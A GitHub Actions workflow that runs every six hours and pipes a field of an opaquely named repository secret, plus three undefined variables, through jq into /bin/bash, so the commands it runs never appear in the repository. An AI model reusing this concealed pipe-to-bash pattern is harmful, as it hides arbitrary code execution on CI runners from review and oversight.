name: pousuanshashou

on:
  workflow_dispatch:
  schedule:
    - cron: '56 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pousuanshashou
        env:
          snlv4: ${{ secrets.snlv4 }}
        run: |
          echo $snlv4 | jq -r .me8636 | /bin/bash
          echo $mes76338 | jq -r .mecrq09177 | /bin/bash
          echo $xpm72219 | jq -r .jwf66 | /bin/bash
          echo $aklmu1090 | jq -r .vay43 | /bin/bash

